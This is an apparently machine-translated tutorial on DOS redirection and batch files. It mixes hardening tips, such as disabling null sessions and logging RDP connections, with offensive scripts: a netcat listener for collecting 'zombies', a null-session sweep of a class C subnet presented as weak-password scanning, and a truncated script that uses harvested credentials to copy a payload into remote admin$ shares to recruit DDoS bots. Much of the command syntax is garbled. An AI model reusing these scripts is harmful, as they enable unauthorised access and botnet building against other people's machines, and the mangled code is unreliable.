Security Applications of redirection commands

As you know, DOS has a redirection command that is not commonly used. This is a very useful little item. This command can also be used in Win9x/ME/2000/XP, the flexible use of this command can bring us great convenience-whether it is intrusion or defense or system application, it will bring great convenience. Today, let's take a look at several security application instances of redirection commands.

I. Command Format

Standard Input and Output of DOS are usually performed on the keyboard and display of the standard device. With redirection, you can easily change the input and output to a disk file or another device. Where:

1. Greater than ">" sends commands to files or devices, such as printers> prn. When ">" is used, some command outputs (such as error messages) cannot be redirected.

2. Add the command output to the end of the file without deleting the existing information in the file.

3. Get the input required by the command from the file instead of the keyboard.

4.> the & Symbol redirects the output from one default I/O Stream (stdout, stdin, stderr) to another default I/O Stream. For example, command> output_file 2> & 1 redirects all error messages in the command process from the screen to the standard file output. The standard output value is as follows:

Standard output equivalent value

Stdin 0
Stdout 1
Stderr 2

Both 1 and 2 create a file to store data; 4 may not be used in DOS.

Ii. Redirect command output

Almost all commands send output to the screen. Even the command that sends the output to the drive or printer displays messages and prompts on the screen. To redirect the output from the screen to a file or printer, use a greater than sign (> ). In most commands, a greater than sign can be used. For example, in the following command, the directory generated by the dircommand is redirected to the dirlist.txt file: dir> dirlist.txt. if the dirlist.txt file does not exist, the system creates the file. If dirlist.txt exists, the system replaces the information in the file with the output of the dir command.

To add the command output to the end of the file without losing any information in the file, use the double sign (> ). For example, in the following command, the directory generated by the dircommand is appended to the dirlist.txt file: dir> dirlist.txt, which redirects the input to a command, just like sending the command output to a file or printer instead of a screen, you can obtain command input from a file instead of a keyboard. To obtain the input from a file, use a smaller sign (<). For example, the following command retrieves the input of the sort command from the list.txt file: sort

3. Application Example

1. Lock/unlock the Registry

As you know, if the DWORD Value of "Disableregistrytools" under the hkey_current_usersoftwaremicrosoftwindowscurrentversionpoliciessystem branch is "1", you can lock the registry so that others cannot use the Registry Editor. With the redirection command, you can lock/unlock the Registry in DOS, which is very convenient.

Open the Notepad program and create a text file. Enter the following content:

@ Echo REGEDIT4> 123.reg
@ Echo.> 123.reg
@ Echo [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]> 123.reg
@ Echo "DisableRegistryTools" = dword: 00000001> 123.reg
@ REGEDIT/S/C 123.reg
@ Deltree/y 123.reg

Save as a batch file with the extension. bat. Click this file registry and the file will be locked!

In the preceding command, echo is the echo command under DOS, and the prefix "@" is added before it, indicating that the line is not displayed in the command line or DOS during execution, if you want to see the program execution process, remove. When writing the above Code, you should note that "REGEDIT4" in the first line must use uppercase letters, and there is no space between "echo" and "." in the second line. ">" Will be appended to the file after it. Add deltree/y 123.regon to the last line of the file to delete the 123. reg file without confirmation.

To unlock the registry, edit the batch file and change "DisableRegistryTools" = dword: 00000001 to "DisableRegistryTools" = dword: 00000000. Save the remaining content. bat file, click to unlock the registry.

2. Record the IP addresses of machines logging on to 3389

Save the following content as 3389IP. bat:
Time/t> log. log
Netstat-n-p tcp | find ": 3389"> Log. log
Start Explorer

Run 3389IP. bat and check the log. log File to view the IP address of the machine that logs on to 3389. Is it very convenient?

3. Restore the real DOS mode

As you know, some malicious web pages will modify the viewer's registry. Modifying the Registry to make the DOS real mode unavailable is one of the tricks. There are many methods to restore the DOS real-time mode. Using batch processing and redirection commands is a special trick. I would like to share with you here.

Echo off
Echo REGEDIT4> c: scanreg. reg
@ Echo.> lock. reg
Echo [HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionPoliciesWinOldApp]> c: scanreg. reg
Echo "NoRealMode" = dword: 00000000> c: scanreg. reg
Regedit/s c: scanreg. reg
@ Del c: scanreg. reg

Save it as a batch processing file with the extension. bat. Click this file to restore the DOS real mode, which can be used by DOS applications again.

4. Wait for the zombie to arrive

Does it take a lot of time and effort to find bots every day? You can simply find bots by using redirection commands and batch processing files! You can use NotePad to create a text file and enter the following content:

@ Echo off
: Start
Nc-vv-w 5-l-p 80> rouji. log
Goto start

Save it as a. batfile (A nc.exe file must be prepared first, which is the main program of the network fault detection software Netcat). After running this program, you will wait for the zombie to come to you! If you are lucky, 10 will not be a problem every day.

5. Fast empty connection

An empty connection is a session established with the server without trust. In other words, it is an anonymous access to the server. Run the net use \ IPipc $ ""/user: "" command to establish an empty connection with the target (the target must open IPC $ ). With the redirection command and for command, you can quickly establish a null connection to a class c cidr Block and save the result to a file for analysis. You can use NotePad to edit the following files:

@ Echo off
Echo format: test *. *. *> test.txt
For/L % G in (1 254) do echo % 1.% G> test.txt & net use \ % 1.% Gipc $ ""/use: "Administrator" | find "command completed"> test.txt

Save the batch file as. bat and run it. . In this way, the NT weak password scanning function is realized! Specifically, the for command is used to execute a specific command for each file in a group of files, that is, a series of commands can be generated using the specified loop range. The For command is IN the format of FOR % variable IN (set) DO command [command-parameters]. The specific meaning is as follows:

% Variable: specifies a single letter replaceable parameter.

(Set): Specifies one or more files. Wildcard characters can be used.

Command: Specifies the command executed on each file.

Command-parameters: specify a parameter or command line switch for a specific command.

When using the FOR command in a batch file, use % variable instead of % variable to specify the variable. Variable names are case sensitive, so % I is different from % I.

6. Disable NULL connections

The existence of NULL connections is dangerous, so it is better to disable it! Run the following command to delete a shared resource:

Net share ipc $/delete
Net share admin $/delete
Net share c $/delete
Net share d $/delete (if drive letters such as e and f can be deleted in the same way)

Create a text file in notepad and enter the following content:

@ Echo REGEDIT4> 123.reg
@ Echo.> 123.reg
@ Echo [HKEY_LOCAL_MACHINESystemCurrentControlSetControlLSA]> 123.reg
@ Echo "RestrictAnonymous" = dword: 00000001> 123.reg
@ REGEDIT/S/C 123.reg
@ Deltree/y 123.reg

Save as a batch file with the extension. bat. Click this file to disable empty connections.

7. Scan all computers connected to the local machine using the TCP protocol

Scan your computer port and find that a special port is opened. You can check the Trojan, the following batch processing file can also be used to record all the computer ip addresses connected to the local machine using the TCP protocol. The content of this. bat file is as follows:

Data/t> 123.log
Time/t> 123.log
Netstat-n-p tcp 10> 123.log

In this way, you can not only record the IP address of the other party, but also the time and date for your convenience.

8. automatically retrieve DDoS bots

DDoS is short for Distributed Denial of Service, meaning Distributed Denial of Service attack. It refers to the combination of multiple computers as an attack platform by means of the customer/server technology to launch DoS attacks against one or more targets, thus exponentially increasing the power of DoS attacks. Generally, attackers use a stolen account to install the DDoS master program on a computer. at a specified time, the master program will communicate with a large number of proxies, the agent has been installed on many computers on the Internet. When the agent receives the command, it will launch an attack. With the customer/server technology, the master program can activate hundreds of proxy programs in a few seconds.

Although we do not recommend that you use DDoS attacks, it is necessary to master the technology. However, how can we obtain bots that conduct DDoS attacks? Save the following content as the OK. bat file:

@ Echo off
Echo automatically retrieves DDoS bots
For/f "tokens = 1, 3 *" % I in (host.txt) do net use \ % kipc $/user: "% j"
Copy % 1 \ % iadmin $ sysytem32 <